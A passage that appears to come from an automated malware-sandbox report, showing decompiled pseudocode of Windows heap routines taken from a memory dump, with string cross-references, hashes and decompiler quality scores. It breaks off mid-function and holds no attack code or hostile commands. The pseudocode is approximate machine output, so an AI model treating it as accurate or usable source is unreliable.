                                                                                                                          • Instruction Fuzzy Hash: 4701F0325085509ED315A76CF45FF9177A8DB81B34F1DC07DF106576D3CBA45844C261
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 70%
                                                                                                                          			E009EA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                                                                          				void* _v5;
                                                                                                                          				signed short _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed short _v24;
                                                                                                                          				signed short _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed short _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				signed short* _v52;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t131;
                                                                                                                          				signed char _t134;
                                                                                                                          				signed int _t138;
                                                                                                                          				char _t141;
                                                                                                                          				signed short _t142;
                                                                                                                          				void* _t146;
                                                                                                                          				signed short _t147;
                                                                                                                          				intOrPtr* _t149;
                                                                                                                          				intOrPtr _t156;
                                                                                                                          				signed int _t167;
                                                                                                                          				signed int _t168;
                                                                                                                          				signed short* _t173;
                                                                                                                          				signed short _t174;
                                                                                                                          				intOrPtr* _t182;
                                                                                                                          				signed short _t184;
                                                                                                                          				intOrPtr* _t187;
                                                                                                                          				intOrPtr _t197;
                                                                                                                          				intOrPtr _t206;
                                                                                                                          				intOrPtr _t210;
                                                                                                                          				signed short _t211;
                                                                                                                          				intOrPtr* _t212;
                                                                                                                          				signed short _t214;
                                                                                                                          				signed int _t216;
                                                                                                                          				intOrPtr _t217;
                                                                                                                          				signed char _t225;
                                                                                                                          				signed short _t235;
                                                                                                                          				signed int _t237;
                                                                                                                          				intOrPtr* _t238;
                                                                                                                          				signed int _t242;
                                                                                                                          				unsigned int _t245;
                                                                                                                          				signed int _t251;
                                                                                                                          				intOrPtr* _t252;
                                                                                                                          				signed int _t253;
                                                                                                                          				intOrPtr* _t255;
                                                                                                                          				signed int _t256;
                                                                                                                          				void* _t257;
                                                                                                                          				void* _t260;
                                                                                                                          
                                                                                                                          				_t256 = __edx;
                                                                                                                          				_t206 = __ecx;
                                                                                                                          				_t235 = _a4;
                                                                                                                          				_v44 = __ecx;
                                                                                                                          				_v24 = _t235;
                                                                                                                          				if(_t235 == 0) {
                                                                                                                          					L41:
                                                                                                                          					return _t131;
                                                                                                                          				}
                                                                                                                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                                                                          				if(_t251 == 0) {
                                                                                                                          					__eflags =  *0xab8748 - 1;
                                                                                                                          					if( *0xab8748 >= 1) {
                                                                                                                          						__eflags =  *(__edx + 2) & 0x00000008;
                                                                                                                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                                                                          							_t110 = _t256 + 0xfff; // 0xfe7
                                                                                                                          							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                                                                          							if((_t110 & 0xfffff000) != __edx) {
                                                                                                                          								_t197 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t197 + 0xc);
                                                                                                                          								if( *(_t197 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          									_t260 = _t257 + 4;
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          									_t260 = _t257 + 8;
                                                                                                                          								}
                                                                                                                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                                                                          								E009CB150();
                                                                                                                          								_t257 = _t260 + 4;
                                                                                                                          								__eflags =  *0xab7bc8;
                                                                                                                          								if(__eflags == 0) {
                                                                                                                          									E00A82073(_t206, 1, _t251, __eflags);
                                                                                                                          								}
                                                                                                                          								_t235 = _v24;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                                                                          				if(_t134 == 0) {
                                                                                                                          					_t210 = _t206;
                                                                                                                          					_v48 = _t206;
                                                                                                                          				} else {
                                                                                                                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                                          					_v48 = _t210;
                                                                                                                          				}
                                                                                                                          				_v5 =  *(_t256 + 2);
                                                                                                                          				do {
                                                                                                                          					if(_t235 > 0xfe00) {
                                                                                                                          						_v12 = 0xfe00;
                                                                                                                          						__eflags = _t235 - 0xfe01;
                                                                                                                          						if(_t235 == 0xfe01) {
                                                                                                                          							_v12 = 0xfdf0;
                                                                                                                          						}
                                                                                                                          						_t138 = 0;
                                                                                                                          					} else {
                                                                                                                          						_v12 = _t235 & 0x0000ffff;
                                                                                                                          						_t138 = _v5;
                                                                                                                          					}
                                                                                                                          					 *(_t256 + 2) = _t138;
                                                                                                                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                                                                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                                                                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                                                                          						_t141 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                                                                          						_v40 = _t141;
                                                                                                                          						if(_t141 >= 0xfe) {
                                                                                                                          							_push(_t210);
                                                                                                                          							E00A8A80D(_t236, _t256, _t210, 0);
                                                                                                                          							_t141 = _v40;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                                                                          					 *((char*)(_t256 + 6)) = _t141;
                                                                                                                          					_t142 = _v12;
                                                                                                                          					 *_t256 = _t142;
                                                                                                                          					 *(_t256 + 3) = 0;
                                                                                                                          					_t211 = _t142 & 0x0000ffff;
                                                                                                                          					 *((char*)(_t256 + 7)) = 0;
                                                                                                                          					_v20 = _t211;
                                                                                                                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                                                                          						_t119 = _t256 + 0x10; // -8
                                                                                                                          						E00A1D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                                                                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                                                                          						_t211 = _v20;
                                                                                                                          					}
                                                                                                                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                                                          					if(_t252 == 0) {
                                                                                                                          						L56:
                                                                                                                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                                                                          						_t146 = _t206 + 0xc0;
                                                                                                                          						goto L19;
                                                                                                                          					} else {
                                                                                                                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                                                                          							L15:
                                                                                                                          							_t185 = _t211;
                                                                                                                          							goto L17;
                                                                                                                          						} else {
                                                                                                                          							while(1) {
                                                                                                                          								_t187 =  *_t252;
                                                                                                                          								if(_t187 == 0) {
                                                                                                                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                                                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                                                          									goto L17;
                                                                                                                          								}
                                                                                                                          								_t252 = _t187;
                                                                                                                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								goto L15;
                                                                                                                          							}
                                                                                                                          							while(1) {
                                                                                                                          								L17:
                                                                                                                          								_t212 = E009EAB40(_t206, _t252, 1, _t185, _t211);
                                                                                                                          								if(_t212 != 0) {
                                                                                                                          									_t146 = _t206 + 0xc0;
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t252 =  *_t252;
                                                                                                                          								_t211 = _v20;
                                                                                                                          								_t185 =  *(_t252 + 0x14);
                                                                                                                          							}
                                                                                                                          							L19:
                                                                                                                          							if(_t146 != _t212) {
                                                                                                                          								_t237 =  *(_t206 + 0x4c);
                                                                                                                          								_t253 = _v20;
                                                                                                                          								while(1) {
                                                                                                                          									__eflags = _t237;
                                                                                                                          									if(_t237 == 0) {
                                                                                                                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                                                                          									} else {
                                                                                                                          										_t184 =  *(_t212 - 8);
                                                                                                                          										_t237 =  *(_t206 + 0x4c);
                                                                                                                          										__eflags = _t184 & _t237;
                                                                                                                          										if((_t184 & _t237) != 0) {
                                                                                                                          											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                                                                          											__eflags = _t184;
                                                                                                                          										}
                                                                                                                          										_t147 = _t184 & 0x0000ffff;
                                                                                                                          									}
                                                                                                                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                                                                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                                                                          										goto L20;
                                                                                                                          									}
                                                                                                                          									_t212 =  *_t212;
                                                                                                                          									__eflags = _t206 + 0xc0 - _t212;
                                                                                                                          									if(_t206 + 0xc0 != _t212) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										goto L20;
                                                                                                                          									}
                                                                                                                          									goto L56;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L20:
                                                                                                                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                                                                          							_t33 = _t256 + 8; // -16
                                                                                                                          							_t238 = _t33;
                                                                                                                          							_t254 =  *_t149;
                                                                                                                          							if( *_t149 != _t212) {
                                                                                                                          								_push(_t212);
                                                                                                                          								E00A8A80D(0, _t212, 0, _t254);
                                                                                                                          							} else {
                                                                                                                          								 *_t238 = _t212;
                                                                                                                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                                                                          								 *_t149 = _t238;
                                                                                                                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                                                                          							}
                                                                                                                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                                                                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                                                          							if(_t255 == 0) {
                                                                                                                          								L36:
                                                                                                                          								if( *(_t206 + 0x4c) != 0) {
                                                                                                                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                                                                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                                                                          								}
                                                                                                                          								_t210 = _v48;
                                                                                                                          								_t251 = _v12 & 0x0000ffff;
                                                                                                                          								_t131 = _v20;
                                                                                                                          								_t235 = _v24 - _t131;
                                                                                                                          								_v24 = _t235;
                                                                                                                          								_t256 = _t256 + _t131 * 8;
                                                                                                                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                                                                          									goto L41;
                                                                                                                          								} else {
                                                                                                                          									goto L39;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_t216 =  *_t256 & 0x0000ffff;
                                                                                                                          								_v28 = _t216;
                                                                                                                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                                                                          									L28:
                                                                                                                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                                                                          									_v32 = _t242;
                                                                                                                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                                                                          										_t167 = _t242 + _t242;
                                                                                                                          									} else {
                                                                                                                          										_t167 = _t242;
                                                                                                                          									}
                                                                                                                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                                                                          									_t168 = _t167 << 2;
                                                                                                                          									_v40 = _t168;
                                                                                                                          									_t206 = _v44;
                                                                                                                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                                                                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                                                                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                                                                          									}
                                                                                                                          									_t217 = _v16;
                                                                                                                          									if(_t217 != 0) {
                                                                                                                          										_t173 = _t217 - 8;
                                                                                                                          										_v52 = _t173;
                                                                                                                          										_t174 =  *_t173;
                                                                                                                          										__eflags =  *(_t206 + 0x4c);
                                                                                                                          										if( *(_t206 + 0x4c) != 0) {
                                                                                                                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                                                                          											_v36 = _t245;
                                                                                                                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                                                                          											__eflags = _t245 >> 0x18 - _t225;
                                                                                                                          											if(_t245 >> 0x18 != _t225) {
                                                                                                                          												_push(_t225);
                                                                                                                          												E00A8A80D(_t206, _v52, 0, 0);
                                                                                                                          											}
                                                                                                                          											_t174 = _v36;
                                                                                                                          											_t217 = _v16;
                                                                                                                          											_t242 = _v32;
                                                                                                                          										}
                                                                                                                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                                                                          										__eflags = _v28;
                                                                                                                          										if(_v28 > 0) {
                                                                                                                          											goto L34;
                                                                                                                          										} else {
                                                                                                                          											goto L33;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										L33:
                                                                                                                          										_t58 = _t256 + 8; // -16
                                                                                                                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                                                                          										_t206 = _v44;
                                                                                                                          										_t217 = _v16;
                                                                                                                          										L34:
                                                                                                                          										if(_t217 == 0) {
                                                                                                                          											asm("bts eax, edx");
                                                                                                                          										}
                                                                                                                          										goto L36;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									goto L24;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L24:
                                                                                                                          									_t182 =  *_t255;
                                                                                                                          									if(_t182 == 0) {
                                                                                                                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                                                                          										__eflags = _t216;
                                                                                                                          										goto L28;
                                                                                                                          									}
                                                                                                                          									_t255 = _t182;
                                                                                                                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										goto L28;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L28;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L39:
                                                                                                                          				} while (_t235 != 0);
                                                                                                                          				_t214 = _v12;
                                                                                                                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                                                                          				 *(_t256 + 4) = _t131;
                                                                                                                          				if(_t214 == 0) {
                                                                                                                          					__eflags =  *0xab8748 - 1;
                                                                                                                          					if( *0xab8748 >= 1) {
                                                                                                                          						_t127 = _t256 + 0xfff; // 0xfff
                                                                                                                          						_t131 = _t127 & 0xfffff000;
                                                                                                                          						__eflags = _t131 - _t256;
                                                                                                                          						if(_t131 != _t256) {
                                                                                                                          							_t156 =  *[fs:0x30];
                                                                                                                          							__eflags =  *(_t156 + 0xc);
                                                                                                                          							if( *(_t156 + 0xc) == 0) {
                                                                                                                          								_push("HEAP: ");
                                                                                                                          								E009CB150();
                                                                                                                          							} else {
                                                                                                                          								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          							}
                                                                                                                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                                                                          							_t131 = E009CB150();
                                                                                                                          							__eflags =  *0xab7bc8;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_t131 = E00A82073(_t206, 1, _t251, __eflags);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				goto L41;
                                                                                                                          			}























































                                                                                                                          0x009eab0c
                                                                                                                          0x009eab0f
                                                                                                                          0x009eab15
                                                                                                                          0x00a32320
                                                                                                                          0x00a32320
                                                                                                                          0x009eab1b
                                                                                                                          0x009ea89c
                                                                                                                          0x009ea89f
                                                                                                                          0x009ea8a2
                                                                                                                          0x009ea8a2
                                                                                                                          0x009ea8a5
                                                                                                                          0x009ea8af
                                                                                                                          0x009ea8b3
                                                                                                                          0x009ea8b8
                                                                                                                          0x009eaa66
                                                                                                                          0x009ea8be
                                                                                                                          0x009ea8c5
                                                                                                                          0x009ea8c6
                                                                                                                          0x009ea8ce
                                                                                                                          0x00a32328
                                                                                                                          0x00a32332
                                                                                                                          0x00a32337
                                                                                                                          0x00a32337
                                                                                                                          0x009ea8ce
                                                                                                                          0x009ea8d4
                                                                                                                          0x009ea8d8
                                                                                                                          0x009ea8db
                                                                                                                          0x009ea8de
                                                                                                                          0x009ea8e1
                                                                                                                          0x009ea8e5
                                                                                                                          0x009ea8e8
                                                                                                                          0x009ea8f0
                                                                                                                          0x009ea8f3
                                                                                                                          0x00a3234c
                                                                                                                          0x00a32350
                                                                                                                          0x00a32355
                                                                                                                          0x00a32359
                                                                                                                          0x00a32359
                                                                                                                          0x009ea8f9
                                                                                                                          0x009ea901
                                                                                                                          0x009eaae4
                                                                                                                          0x009eaae4
                                                                                                                          0x009eaaea
                                                                                                                          0x00000000
                                                                                                                          0x009ea907
                                                                                                                          0x009ea90a
                                                                                                                          0x009ea91d
                                                                                                                          0x009ea91d
                                                                                                                          0x00000000
                                                                                                                          0x009ea910
                                                                                                                          0x009ea910
                                                                                                                          0x009ea910
                                                                                                                          0x009ea914
                                                                                                                          0x009ea924
                                                                                                                          0x009ea924
                                                                                                                          0x009ea924
                                                                                                                          0x009ea924
                                                                                                                          0x009ea916
                                                                                                                          0x009ea91b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea91b
                                                                                                                          0x009ea925
                                                                                                                          0x009ea925
                                                                                                                          0x009ea932
                                                                                                                          0x009ea936
                                                                                                                          0x009ea93c
                                                                                                                          0x009ea93c
                                                                                                                          0x009ea93c
                                                                                                                          0x009eab22
                                                                                                                          0x009eab24
                                                                                                                          0x009eab27
                                                                                                                          0x009eab27
                                                                                                                          0x009ea942
                                                                                                                          0x009ea944
                                                                                                                          0x009eaaba
                                                                                                                          0x009eaabd
                                                                                                                          0x009eaac0
                                                                                                                          0x009eaac0
                                                                                                                          0x009eaac2
                                                                                                                          0x009eab2f
                                                                                                                          0x009eaac4
                                                                                                                          0x009eaac4
                                                                                                                          0x009eaac7
                                                                                                                          0x009eaaca
                                                                                                                          0x009eaacc
                                                                                                                          0x009eaace
                                                                                                                          0x009eaace
                                                                                                                          0x009eaace
                                                                                                                          0x009eaad1
                                                                                                                          0x009eaad1
                                                                                                                          0x009eaad7
                                                                                                                          0x009eaad9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32361
                                                                                                                          0x00a32369
                                                                                                                          0x00a3236b
                                                                                                                          0x00000000
                                                                                                                          0x00a32371
                                                                                                                          0x00000000
                                                                                                                          0x00a32371
                                                                                                                          0x00000000
                                                                                                                          0x00a3236b
                                                                                                                          0x009eaac0
                                                                                                                          0x009ea94a
                                                                                                                          0x009ea94a
                                                                                                                          0x009ea94d
                                                                                                                          0x009ea94d
                                                                                                                          0x009ea950
                                                                                                                          0x009ea954
                                                                                                                          0x00a32376
                                                                                                                          0x00a32380
                                                                                                                          0x009ea95a
                                                                                                                          0x009ea95a
                                                                                                                          0x009ea95c
                                                                                                                          0x009ea95f
                                                                                                                          0x009ea961
                                                                                                                          0x009ea961
                                                                                                                          0x009ea967
                                                                                                                          0x009ea96a
                                                                                                                          0x009ea972
                                                                                                                          0x009eaa02
                                                                                                                          0x009eaa06
                                                                                                                          0x009eaa10
                                                                                                                          0x009eaa16
                                                                                                                          0x009eaa16
                                                                                                                          0x009eaa1b
                                                                                                                          0x009eaa21
                                                                                                                          0x009eaa24
                                                                                                                          0x009eaa27
                                                                                                                          0x009eaa29
                                                                                                                          0x009eaa2c
                                                                                                                          0x009eaa32
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea978
                                                                                                                          0x009ea978
                                                                                                                          0x009ea97b
                                                                                                                          0x009ea981
                                                                                                                          0x009ea996
                                                                                                                          0x009ea998
                                                                                                                          0x009ea99f
                                                                                                                          0x009ea9a2
                                                                                                                          0x00a3238a
                                                                                                                          0x009ea9a8
                                                                                                                          0x009ea9a8
                                                                                                                          0x009ea9a8
                                                                                                                          0x009ea9aa
                                                                                                                          0x009ea9ad
                                                                                                                          0x009ea9b0
                                                                                                                          0x009ea9bb
                                                                                                                          0x009ea9be
                                                                                                                          0x009ea9c7
                                                                                                                          0x009ea9c9
                                                                                                                          0x009ea9c9
                                                                                                                          0x009ea9cc
                                                                                                                          0x009ea9d1
                                                                                                                          0x009eaa6d
                                                                                                                          0x009eaa70
                                                                                                                          0x009eaa73
                                                                                                                          0x009eaa75
                                                                                                                          0x009eaa79
                                                                                                                          0x009eaa7e
                                                                                                                          0x009eaa82
                                                                                                                          0x009eaa8f
                                                                                                                          0x009eaa94
                                                                                                                          0x009eaa96
                                                                                                                          0x00a32392
                                                                                                                          0x00a323a1
                                                                                                                          0x00a323a1
                                                                                                                          0x009eaa9c
                                                                                                                          0x009eaa9f
                                                                                                                          0x009eaaa2
                                                                                                                          0x009eaaa2
                                                                                                                          0x009eaaa8
                                                                                                                          0x009eaaab
                                                                                                                          0x009eaaaf
                                                                                                                          0x00000000
                                                                                                                          0x009eaab5
                                                                                                                          0x00000000
                                                                                                                          0x009eaab5
                                                                                                                          0x009ea9d7
                                                                                                                          0x009ea9d7
                                                                                                                          0x009ea9da
                                                                                                                          0x009ea9e0
                                                                                                                          0x009ea9e3
                                                                                                                          0x009ea9e6
                                                                                                                          0x009ea9e9
                                                                                                                          0x009ea9eb
                                                                                                                          0x009ea9fd
                                                                                                                          0x009ea9fd
                                                                                                                          0x00000000
                                                                                                                          0x009ea9eb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea983
                                                                                                                          0x009ea983
                                                                                                                          0x009ea983
                                                                                                                          0x009ea987
                                                                                                                          0x009ea995
                                                                                                                          0x009ea995
                                                                                                                          0x009ea995
                                                                                                                          0x009ea995
                                                                                                                          0x009ea989

                                                                                                                          Strings
                                                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00A322F3
                                                                                                                          • HEAP[%wZ]: , xrefs: 00A322D7, 00A323E7
                                                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00A32403
                                                                                                                          • HEAP: , xrefs: 00A322E6, 00A323F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                          • API String ID: 0-1657114761
                                                                                                                          • Opcode ID: e8c2d06d1c7db2bb479e600830a8f460346f7cc05a0d0c009b32f82683611aec
                                                                                                                          • Instruction ID: 55e20b35901a7acd6516eb7ec399630f4874e1a2beebe1efb7cf44adb79afd8e
                                                                                                                          • Opcode Fuzzy Hash: e8c2d06d1c7db2bb479e600830a8f460346f7cc05a0d0c009b32f82683611aec
                                                                                                                          • Instruction Fuzzy Hash: FCD1CF30A002859FDB19CF69C490BBAB7F6FF98300F158569E85A9B352E334BC45CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E009EA229(void* __ecx, void* __edx) {
                                                                                                                          				signed int _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				void* _v44;
                                                                                                                          				void* _v48;
                                                                                                                          				void* _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				void* __ebx;
                                                                                                                          				signed int _t55;
                                                                                                                          				signed int _t57;
                                                                                                                          				void* _t61;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t71;
                                                                                                                          				signed char* _t74;
                                                                                                                          				intOrPtr _t75;
                                                                                                                          				signed char* _t80;
                                                                                                                          				intOrPtr _t81;
                                                                                                                          				void* _t82;
                                                                                                                          				signed char* _t85;
                                                                                                                          				signed char _t91;
                                                                                                                          				void* _t103;
                                                                                                                          				void* _t105;
                                                                                                                          				void* _t121;
                                                                                                                          				void* _t129;
                                                                                                                          				signed int _t131;
                                                                                                                          				void* _t133;
                                                                                                                          
                                                                                                                          				_t105 = __ecx;
                                                                                                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                                                                          				_t103 = __edx;
                                                                                                                          				_t129 = __ecx;
                                                                                                                          				E009EDF24(__edx,  &_v28, _t133);
                                                                                                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                                                                          				asm("sbb edi, edi");
                                                                                                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                                                                          				if(_t55 != 0) {
                                                                                                                          					_push(0);
                                                                                                                          					_push(0x14);
                                                                                                                          					_push( &_v24);
                                                                                                                          					_push(3);
                                                                                                                          					_push(_t129);
                                                                                                                          					_push(0xffffffff);
                                                                                                                          					_t57 = E00A09730();
                                                                                                                          					__eflags = _t57;
                                                                                                                          					if(_t57 < 0) {
                                                                                                                          						L17:
                                                                                                                          						_push(_t105);
                                                                                                                          						E00A8A80D(_t129, 1, _v20, 0);
                                                                                                                          						_t121 = 4;
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					__eflags = _v20 & 0x00000060;
                                                                                                                          					if((_v20 & 0x00000060) == 0) {
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          					__eflags = _v24 - _t129;
                                                                                                                          					if(_v24 == _t129) {
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					goto L17;
                                                                                                                          				}
                                                                                                                          				L1:
                                                                                                                          				_push(_t121);
                                                                                                                          				_push(0x1000);
                                                                                                                          				_push(_t133 + 0x14);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_t133 + 0x20);
                                                                                                                          				_push(0xffffffff);
                                                                                                                          				_t61 = E00A09660();
                                                                                                                          				_t122 = _t61;
                                                                                                                          				if(_t61 < 0) {
                                                                                                                          					_t62 =  *[fs:0x30];
                                                                                                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                                                                          					__eflags =  *(_t62 + 0xc);
                                                                                                                          					if( *(_t62 + 0xc) == 0) {
                                                                                                                          						_push("HEAP: ");
                                                                                                                          						E009CB150();
                                                                                                                          					} else {
                                                                                                                          						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          					}
                                                                                                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                                                                          					_push(_t129);
                                                                                                                          					E009CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                                                                          					_t65 = 0;
                                                                                                                          					L13:
                                                                                                                          					return _t65;
                                                                                                                          				}
                                                                                                                          				_t71 = E009E7D50();
                                                                                                                          				_t124 = 0x7ffe0380;
                                                                                                                          				if(_t71 != 0) {
                                                                                                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          				} else {
                                                                                                                          					_t74 = 0x7ffe0380;
                                                                                                                          				}
                                                                                                                          				if( *_t74 != 0) {
                                                                                                                          					_t75 =  *[fs:0x30];
                                                                                                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                                                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                                                                          						E00A8138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                                                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                          				if(E009E7D50() != 0) {
                                                                                                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          				} else {
                                                                                                                          					_t80 = _t124;
                                                                                                                          				}
                                                                                                                          				if( *_t80 != 0) {
                                                                                                                          					_t81 =  *[fs:0x30];
                                                                                                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                                                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                                                                          						__eflags = E009E7D50();
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
